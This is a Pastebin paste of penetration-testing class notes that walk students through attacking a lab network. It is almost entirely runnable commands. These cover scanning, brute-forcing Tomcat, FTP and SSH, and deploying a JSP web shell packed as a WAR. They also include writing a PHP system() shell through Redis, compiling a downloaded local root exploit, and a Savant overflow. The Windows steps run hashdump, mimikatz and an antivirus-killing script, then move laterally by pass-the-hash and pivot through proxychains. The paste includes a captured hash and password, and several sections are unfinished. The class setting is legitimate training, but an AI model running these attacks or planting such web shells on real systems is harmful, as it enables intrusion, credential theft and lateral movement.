daily pastebin goal
83%
SHARE
TWEET

Untitled

djtroby May 31st, 2017 55 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########################################
  2. # Advanced Pentester Night School      #
  3. # By Joe McCray of Strategic Security  #
  4. ########################################
  5.  
  6.  
  7. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
  8.  
  9. So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
  10. https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf
  11.  
  12. sudo nmap -sP 10.0.0.0/24
  13.      infosecaddicts
  14.  
  15. sudo nmap -sL 10.0.0.0/24
  16.      infosecaddicts
  17.  
  18.  
  19. for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
  20.  
  21. cd ~/toolz
  22.  
  23. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  24.  
  25. gcc ipcrawl.c -o ipcrawl
  26.  
  27. chmod 777 ipcrawl
  28.  
  29. ./ipcrawl 10.0.0.1 10.0.0.254
  30.  
  31.  
  32.  
  33. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  34.  
  35. gcc propecia.c -o propecia
  36.  
  37. sudo cp propecia /bin
  38.      infosecaddicts
  39.  
  40. propecia 10.0.0 22
  41.  
  42. propecia 10.0.0 3389
  43.  
  44. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
  45.  
  46. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
  47.  
  48. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
  49.  
  50. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
  51.  
  52. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
  53.  
  54. cd ~/toolz
  55.  
  56.  
  57.  
  58. #################################################
  59. # Screenshotting the Web Servers in the Network #
  60. #################################################
  61. cd ~/toolz/
  62. mkdir labscreenshots
  63. cd labscreenshots/
  64.  
  65.  
  66. wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  67. tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  68. cd wkhtmltox/bin/
  69. sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
  70.  
  71.  
  72. cd ~/toolz/
  73. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  74. cd Nmap-Tools/NSE/
  75. sudo cp http-screenshot.nse /usr/share/nmap/scripts/
  76.      infosecaddicts
  77.  
  78. sudo nmap --script-updatedb
  79.      infosecaddicts
  80.  
  81.  
  82. cd ~/toolz/labscreenshots/
  83. sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
  84.      infosecaddicts
  85.  
  86.  
  87.  
  88.  
  89. vi screenshots.sh
  90.  
  91. #!/bin/bash
  92. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  93. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  94. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  95.  
  96.  
  97.  
  98.  
  99.  
  100. sh screenshots.sh
  101.  
  102.  
  103.  
  104.  
  105. ##########################
  106. # Nmap NSE tricks to try #
  107. ##########################
  108. sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
  109.      infosecaddicts
  110.  
  111. sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
  112.      infosecaddicts
  113.  
  114. sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
  115.      infosecaddicts
  116.  
  117. sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
  118.      infosecaddicts
  119.  
  120. sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
  121.      infosecaddicts
  122.  
  123. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
  124.      infosecaddicts
  125.  
  126. sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
  127.      infosecaddicts
  128.  
  129. sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
  130.      infosecaddicts
  131.  
  132. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
  133.      infosecaddicts
  134.  
  135. sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
  136.      infosecaddicts
  137.  
  138. sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
  139.      infosecaddicts
  140.  
  141. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
  142.      infosecaddicts
  143.  
  144.  
  145.  
  146.  
  147. #########################
  148. # Building a quick list #
  149. #########################
  150. cd ~
  151. echo bob >> list.txt
  152. echo jim >> list.txt
  153. echo joe >> list.txt
  154. echo tim >> list.txt
  155. echo admin >> list.txt
  156. echo hello >> list.txt
  157. echo rob >> list.txt
  158. echo test >> list.txt
  159. echo aaaaaa >> list.txt
  160. echo larry >> list.txt
  161. echo mario >> list.txt
  162. echo jason >> list.txt
  163. echo john >> list.txt
  164.  
  165.  
  166. ##############
  167. # Using Nmap #
  168. ##############
  169. ******** NOTE: Some of these scans may take up to an hour to run... ********
  170. ******** NOTE: Open them in another terminal window and keep going  ********
  171.  
  172. sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan)
  173.  
  174. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  175.  
  176. sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120
  177.  
  178. sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan)
  179.  
  180. sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120
  181.  
  182.  
  183. ******** NOTE: Some of these scans may take up to an hour to run... ********
  184. ******** NOTE: Open them in another terminal window and keep going  ********
  185.  
  186.  
  187.  
  188. #########################
  189. # Playing with Nmap NSE #
  190. #########################
  191.  
  192. nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
  193.  
  194. nmap -p80 --script dns-brute infosecaddicts.com
  195.  
  196. nmap --script http-robtex-reverse-ip secore.info
  197.  
  198. nmap -Pn -p80 --script=http-headers infosecaddicts.com
  199.  
  200.  
  201. ls /usr/share/nmap/scripts | grep http
  202. nmap -Pn -p80 --script=http-* infosecaddicts.com
  203.  
  204.  
  205.  
  206.  
  207. #####################################
  208. # Writing Your Own Nmap NSE Scripts #
  209. #####################################
  210.  
  211.  
  212. ----------------------------------------------------------------------
  213. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  214.  
  215. -- The Head Section --
  216. -- The Rule Section --
  217. portrule = function(host, port)
  218.     return port.protocol == "tcp"
  219.             and port.number == 80
  220.             and port.state == "open"
  221. end
  222.  
  223. -- The Action Section --
  224. action = function(host, port)
  225.     return "February class bundle!"
  226. end
  227. ----------------------------------------------------------------------
  228.  
  229. - Ok, now that we've made that change let's run the script
  230. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237. ----------------------------------------------------------------------
  238. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  239.  
  240. -- The Head Section --
  241. local shortport = require "shortport"
  242.  
  243. -- The Rule Section --
  244. portrule = shortport.http
  245.  
  246.  
  247. -- The Action Section --
  248. action = function(host, port)
  249.     return "February class bundle!"
  250. end
  251. ----------------------------------------------------------------------
  252.  
  253. - Ok, now that we've made that change let's run the script
  254. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261.  
  262. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  263.  
  264. ----------------------------------------------------------------------
  265. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  266.  
  267. -- The Head Section --
  268. local shortport = require "shortport"
  269. local http = require "http"
  270.  
  271. -- The Rule Section --
  272. portrule = shortport.http
  273.  
  274. -- The Action Section --
  275. action = function(host, port)
  276.  
  277.     local uri = "/installing-metasploit-in-ubunt/"
  278.     local response = http.get(host, port, uri)
  279.     return response.status
  280.  
  281. end
  282. ----------------------------------------------------------------------
  283.  
  284. - Ok, now that we've made that change let's run the script
  285. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  286.  
  287.  
  288.  
  289.  
  290. ----------------------------------------------------------------------
  291. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  292.  
  293. -- The Head Section --
  294. local shortport = require "shortport"
  295. local http = require "http"
  296.  
  297. -- The Rule Section --
  298. portrule = shortport.http
  299.  
  300. -- The Action Section --
  301. action = function(host, port)
  302.  
  303.     local uri = "/installing-metasploit-in-ubunt/"
  304.     local response = http.get(host, port, uri)
  305.  
  306.     if ( response.status == 200 ) then
  307.         return response.body
  308.     end
  309.  
  310. end
  311. ----------------------------------------------------------------------
  312.  
  313. - Ok, now that we've made that change let's run the script
  314. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324. ----------------------------------------------------------------------
  325. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  326.  
  327. -- The Head Section --
  328. local shortport = require "shortport"
  329. local http = require "http"
  330. local string = require "string"
  331.  
  332. -- The Rule Section --
  333. portrule = shortport.http
  334.  
  335. -- The Action Section --
  336. action = function(host, port)
  337.  
  338.     local uri = "/installing-metasploit-in-ubunt/"
  339.     local response = http.get(host, port, uri)
  340.  
  341.     if ( response.status == 200 ) then
  342.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  343.         return title
  344.     end
  345.  
  346. end
  347. ----------------------------------------------------------------------
  348.  
  349. - Ok, now that we've made that change let's run the script
  350. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  351.  
  352.  
  353.  
  354.  
  355.  
  356.  
  357.  
  358. ----------------------------------------------------------------------
  359. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  360.  
  361. -- The Head Section --
  362. local shortport = require "shortport"
  363. local http = require "http"
  364. local string = require "string"
  365.  
  366. -- The Rule Section --
  367. portrule = shortport.http
  368.  
  369. -- The Action Section --
  370. action = function(host, port)
  371.  
  372.     local uri = "/installing-metasploit-in-ubunt/"
  373.     local response = http.get(host, port, uri)
  374.  
  375.     if ( response.status == 200 ) then
  376.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  377.  
  378.         if (title) then
  379.             return "Vulnerable"
  380.         else
  381.             return "Not Vulnerable"
  382.         end
  383.     end
  384. end
  385.  
  386. ----------------------------------------------------------------------
  387.  
  388. - Ok, now that we've made that change let's run the script
  389. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402. ******** Attacking Kevgir ********
  403. I figured I've give you something fun to play with.
  404.  
  405.  
  406.  
  407. ###############
  408. # Using Nikto #
  409. ###############
  410. cd ~/toolz/nikto-2.1.1
  411.  
  412. perl nikto.pl -update
  413.  
  414. perl nikto.pl -h 10.0.0.120
  415.  
  416. perl nikto.pl -h 10.0.0.120:8080
  417.  
  418. perl nikto.pl -h 10.0.0.120:8081
  419.  
  420. perl nikto.pl -h 10.0.0.120:9000
  421.  
  422.  
  423.  
  424.  
  425. ####################
  426. # Using Metasploit #
  427. ####################
  428. cd ~/toolz/metasploit
  429.  
  430. ./msfconsole
  431.  
  432. use auxiliary/scanner/http/http_version        
  433.  
  434. set RHOSTS 10.0.0.120
  435.  
  436. set RPORT 8080
  437.  
  438. run
  439.  
  440.  
  441. -------------------------------
  442.  
  443. use auxiliary/scanner/http/tomcat_enum           
  444.  
  445. set RHOSTS 10.0.0.120
  446.  
  447. set RPORT 8080
  448.  
  449. run
  450.  
  451.  
  452.  
  453.  
  454.  
  455. ####################
  456. # Attacking Tomcat #
  457. ####################
  458. cd ~/toolz/metasploit
  459.  
  460. ./msfconsole
  461.  
  462. use auxiliary/scanner/http/http_version        
  463.  
  464. set RHOSTS 10.0.0.120
  465.  
  466. set RPORT 8080
  467.  
  468. run
  469.  
  470.  
  471.  
  472.  
  473.  
  474. use auxiliary/scanner/http/tomcat_mgr_login          
  475.  
  476. set USERNAME tomcat
  477.  
  478. set USERPASS_FILE /home/infosecaddicts/list.txt
  479.  
  480. set STOP_ON_SUCCESS true
  481.  
  482. set RHOSTS 10.0.0.120
  483.  
  484. set RPORT 8080
  485.  
  486. run
  487.  
  488.  
  489.  
  490.  
  491. use exploit/multi/http/tomcat_mgr_upload
  492.  
  493. set USERNAME tomcat
  494.  
  495. set PASSWORD tomcat
  496.  
  497. set RHOST 10.0.0.120
  498.  
  499. set RPORT 8080
  500.  
  501. set PATH /manager/html
  502.  
  503. set PAYLOAD java/meterpreter/bind_tcp
  504.  
  505. exploit
  506.  
  507.  
  508. run post/linux/gather/checkvm
  509.  
  510. run post/linux/gather/enum_configs
  511.  
  512. run post/linux/gather/enum_protections
  513.  
  514. run post/linux/gather/enum_system
  515.  
  516. run post/linux/gather/enum_users_history
  517.  
  518. run post/linux/gather/hashdump
  519.  
  520. shell
  521.  
  522. /bin/bash
  523.  
  524. id
  525.  
  526. uname -a
  527.  
  528. dpkg -l
  529.  
  530. cd /tmp
  531.  
  532. pwd
  533.  
  534.  
  535. cat >> exploit.c << out
  536.  
  537. **************paste in the content from here *****************
  538. https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
  539.  
  540.  
  541. ------ hit enter a few times ------
  542.  
  543. ------ then type 'out' ----- this closes the file handle...
  544.  
  545.  
  546. gcc -o boom exploit.c
  547.  
  548. ./boom
  549.  
  550. id
  551.  
  552.  
  553. -------------------------------
  554.  
  555.  
  556. hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html
  557.  
  558.  
  559.  
  560.  
  561.  
  562. -------------------------------------------index.jsp-------------------------------------------
  563. <FORM METHOD=GET ACTION='index.jsp'>
  564. <INPUT name='cmd' type=text>
  565. <INPUT type=submit value='Run'>
  566. </FORM>
  567. <%@ page import="java.io.*" %>
  568. <%
  569.    String cmd = request.getParameter("cmd");
  570.    String output = "";
  571.    if(cmd != null) {
  572.       String s = null;
  573.       try {
  574.          Process p = Runtime.getRuntime().exec(cmd,null,null);
  575.          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  576.          while((s = sI.readLine()) != null) { output += s+"</br>"; }
  577.       }  catch(IOException e) {   e.printStackTrace();   }
  578.    }
  579. %>
  580. <pre><%=output %></pre>
  581. -------------------------------------------index.jsp-------------------------------------------
  582.  
  583. ***** now pack the webshell *****
  584.  
  585.  
  586.  
  587. mkdir webshell
  588. cp index.jsp webshell
  589.  
  590. cd webshell
  591. jar -cvf ../webshell.war *
  592.  
  593.  
  594. Deploy the WAR file using the built-in deploy option on the manager web-page.
  595. Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
  596. now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/
  597.  
  598.  
  599.  
  600. ****** This section isn't finished ******
  601.  
  602. cd ~/toolz/metasploit
  603.  
  604. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
  605.  
  606. jar tf ~/bind7777.war
  607.  
  608. ****** This section isn't finished ******
  609.  
  610. Google is your friend hahahahahahahah........
  611.  
  612.  
  613. #################
  614. # Attacking FTP #
  615. #################
  616.  
  617. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  618.  
  619. cd ~/toolz/hydra
  620.  
  621. hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp
  622.  
  623. ftp
  624. open 10.0.0.120
  625. admin
  626. admin
  627. pwd
  628. ls -lah
  629.  
  630. ls ../../
  631.  
  632.  
  633. #################
  634. # Attacking SSH #
  635. #################
  636. cd ~/toolz/hydra
  637.  
  638. hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh
  639.  
  640. ssh -p 1322 admin@10.0.0.120
  641.  
  642.  
  643.  
  644.  
  645. cd ~/toolz/metasploit
  646.  
  647. ./msfconsole
  648.  
  649. use auxiliary/scanner/ssh/ssh_users          
  650.  
  651. set USER_FILE /home/infosecaddicts/list.txt
  652.  
  653. set STOP_ON_SUCCESS true
  654.  
  655. set RHOSTS 10.0.0.120
  656.  
  657. set RPORT 1322
  658.  
  659. run
  660.  
  661.  
  662.  
  663.  
  664.  
  665. use auxiliary/scanner/ssh/ssh_login          
  666.  
  667. set USER_FILE /home/infosecaddicts/list.txt
  668.  
  669. set PASS_FILE /home/infosecaddicts/list.txt
  670.  
  671. set STOP_ON_SUCCESS true
  672.  
  673. set RHOSTS 10.0.0.120
  674.  
  675. set RPORT 1322
  676.  
  677. run
  678.  
  679.  
  680. sessions -l
  681.  
  682. sessions -u 1
  683.  
  684. sessions -i 1
  685.  
  686. id
  687.  
  688.  
  689.  
  690. ########################
  691. # Attacking phpMyAdmin #
  692. ########################
  693. ****** This section isn't finished ******
  694.  
  695. hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  696.  
  697. ****** This section isn't finished ******
  698.  
  699. Google is your friend hahahahahahahah........
  700.  
  701.  
  702.  
  703.  
  704. wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
  705.  
  706. python pmabf.py http://10.0.0.120 root list.txt     (this gave me the WRONG password)
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713. ####################
  714. # Attacking Joomla #
  715. ####################
  716. cd ~/toolz/metasploit
  717.  
  718. ./msfconsole
  719.  
  720. use use auxiliary/scanner/http/joomla_plugins            
  721.  
  722. set RHOSTS 10.0.0.120
  723.  
  724. set RPORT 8080
  725.  
  726. run
  727.  
  728.  
  729. ****** This section isn't finished ******
  730. Google is your friend hahahahahahahah........
  731.  
  732. #####################
  733. # Attacking Jenkins #
  734. #####################
  735.  
  736.  
  737. ****** This section isn't finished ******
  738. Google is your friend hahahahahahahah........
  739.  
  740. #################
  741. # Attacking NFS #
  742. #################
  743. rpcinfo -s 10.0.0.120
  744.  
  745. showmount -e 10.0.0.120
  746.  
  747. mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock
  748.  
  749. ls /tmp/nfs
  750.  
  751. cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
  752. umount -l /tmp/nfs
  753.  
  754. sudo apt-cache search fcrackzip
  755.  
  756. sudo apt-get install -y fcrackzip
  757.  
  758. fcrackzip -D -p /home/infosecaddicts/list.txt
  759.  
  760. unzip -P aaaaaa backup.tar.bz2.zip
  761.  
  762. tar -zxvf backup.tar.bz2
  763.  
  764.  
  765. ###################
  766. # Attacking Redis #
  767. ###################
  768. sudo nmap -p 6379 --script=redis-info 10.0.0.120
  769.     infosecaddicts
  770.  
  771. sudo apt-get install -y redis-tools
  772.     infosecaddicts
  773.  
  774. redis-cli -h 10.0.0.120
  775.  
  776. CONFIG SET dir /var/www/html/main
  777.  
  778. CONFIG GET dir
  779.  
  780. config set dbfilename bomba.php
  781.  
  782. CONFIG GET dbfilename
  783.  
  784. SET cmd "<?php system($_GET['joe']); ?>"
  785.  
  786. BGSAVE
  787.  
  788. http://10.0.0.120/bomba.php
  789.  
  790. http://10.0.0.120/bomba.php?joe=id
  791.  
  792.  
  793. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
  794.  
  795.  
  796.  
  797. ****** This section isn't finished ******
  798. Google is your friend hahahahahahahah........
  799.  
  800. cd ~/toolz/metasploit
  801.  
  802. ./msfconsole
  803.  
  804. use auxiliary/scanner/redis/file_upload
  805.  
  806. set RHOSTS 10.0.0.120
  807.  
  808. set LocalFile
  809.  
  810. ****** This section isn't finished ******
  811.  
  812.  
  813.  
  814.  
  815.  
  816.  
  817. ####################################
  818. # Finally, let's exploit something #
  819. ####################################
  820.  
  821. nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
  822.  
  823. nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
  824.  
  825.     https://www.exploit-db.com/search
  826.  
  827.     Search for:
  828.     Savant httpd 3.1
  829.     Apache httpd 2.0.58 ((Win32))
  830.  
  831.  
  832.     Found one written in Python:
  833.     https://www.exploit-db.com/exploits/18401/
  834.  
  835.     Found one for Savant 3.1 from Metasploit:
  836.     https://www.exploit-db.com/exploits/16770/
  837.  
  838.  
  839.  
  840. cd ~/toolz/metasploit
  841. ./msfconsole
  842. use exploit/windows/http/savant_31_overflow
  843. set RHOST 10.0.0.15
  844. set PAYLOAD windows/meterpreter/bind_nonx_tcp
  845. set RPORT 80
  846. set LPORT 7777
  847. exploit
  848.  
  849.  
  850.  
  851.  
  852.  
  853.  
  854. ********************************** Figure out who and where you are **********************************
  855.  
  856. meterpreter> sysinfo
  857.  
  858.  
  859. meterpreter> getuid
  860.  
  861.  
  862. meterpreter> ipconfig
  863.  
  864.  
  865. meterpreter> run post/windows/gather/checkvm
  866.  
  867.  
  868. meterpreter> run get_local_subnets
  869.  
  870.  
  871.  
  872. ********************************** Escalate privileges and get hashes **********************************
  873.  
  874.  
  875. meterpreter> use priv
  876.  
  877.  
  878.  
  879. meterpreter > getsystem
  880. ...got system (via technique 1).
  881.  
  882. meterpreter > getuid
  883. Server username: NT AUTHORITY\SYSTEM
  884.  
  885. --------------------------------------------------------
  886.  
  887. meterpreter> run killav
  888.  
  889. meterpreter> run post/windows/gather/hashdump
  890.    
  891.     Got the following admin hash:
  892.     Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
  893.  
  894. meterpreter> run post/windows/gather/credentials/credential_collector
  895.  
  896. meterpreter > load mimikatz
  897.  
  898. meterpreter > kerberos
  899.  
  900.     This should give me the administrative password:
  901.     )K5?Jocb(Yx
  902.  
  903.  
  904. ********************************** Enumerate the host you are on **********************************
  905.  
  906. meterpreter> run winenum
  907.  
  908. meterpreter > run post/windows/gather/enum_applications
  909.  
  910. meterpreter > run post/windows/gather/enum_logged_on_users
  911.  
  912. meterpreter > run post/windows/gather/usb_history
  913.  
  914. meterpreter > run post/windows/gather/enum_shares
  915.  
  916. meterpreter > run post/windows/gather/enum_snmp
  917.  
  918. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  919.  
  920.  
  921. ********************************** Get out of Meterpreter **********************************
  922.  
  923. meterpreter> background
  924.  
  925. msf exploit(savant_31_overflow) > back
  926.  
  927. msf>
  928.  
  929.  
  930.  
  931.  
  932. ********************************** Lateral Movement *******************************
  933.  
  934.  
  935. Now we can run the PSEXEC exploit.
  936.  
  937. -- Option 1:
  938. use exploit/windows/smb/psexec
  939.  
  940. set SMBUser Administrator
  941.  
  942. set SMBPass )K5?Jocb(Yx
  943.  
  944. set RHOST 10.0.0.15
  945.  
  946. set payload windows/meterpreter/bind_tcp
  947.  
  948. set LPORT 2345
  949.  
  950. exploit
  951.  
  952. ********************************** Get out of Meterpreter **********************************
  953.  
  954. meterpreter> background
  955.  
  956. msf exploit(psexec) >back
  957.  
  958. msf>
  959.  
  960. **********************************  
  961.  
  962. -- Option 2:
  963. use exploit/windows/smb/psexec
  964.  
  965. set SMBUser Administrator
  966.  
  967. set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
  968.  
  969. set payload windows/meterpreter/bind_tcp
  970.  
  971. set RHOST 10.0.0.15                      
  972.  
  973. set LPORT 5678
  974.  
  975. exploit
  976.  
  977.  
  978.  
  979. ********************************** Set up your Pivot **********************************
  980.  
  981. meterpreter > background
  982.                                                         <-- background the session
  983.         You want to get back to this prompt:
  984.         msf exploit(handler) > back                     <--- you need to get to main msf> prompt
  985.  
  986.  
  987.  
  988.         sessions -l                                     <--find a session you want to pivot through (note the IP and session number)
  989.        
  990.         Now set up Pivot with a route add
  991.         ---------------------------------
  992.  
  993. route print                                             <--- should be blank
  994.  
  995. route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
  996.  
  997.  
  998. route print                                             <----- verify new route
  999.  
  1000. ******************************Scan through your Pivot ******************************
  1001.  
  1002. use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
  1003.  
  1004. set THREADS 10
  1005.  
  1006. set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack
  1007.  
  1008. set PORTS 445
  1009.  
  1010. run
  1011.  
  1012.  
  1013. ####################################
  1014. # Socks Tunneling with Proxychains #
  1015. ####################################
  1016. --- Open a duplicate putty session to your Ubuntu host
  1017.  
  1018. sudo apt-get install -y proxychains
  1019.     infosecaddicts
  1020.  
  1021. sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
  1022.      infosecaddicts
  1023.  
  1024.         Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  1025.         socks4  127.0.0.1 1080
  1026.  
  1027. ***************************Set up a Socks Proxy through your Pivot *************************
  1028.  
  1029.  
  1030. use auxiliary/server/socks4a
  1031.  
  1032. set SRVHOST 127.0.0.1
  1033.  
  1034. set SRVPORT 1080
  1035.  
  1036. run
  1037.  
  1038.         --- Go back to your other putty session with the meterpreter shell
  1039. cd ~
  1040.  
  1041. proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow
  1042.  
  1043. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow
  1044.  
  1045.  
  1046.         ---close the duplicate putty session to your Ubuntu host
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top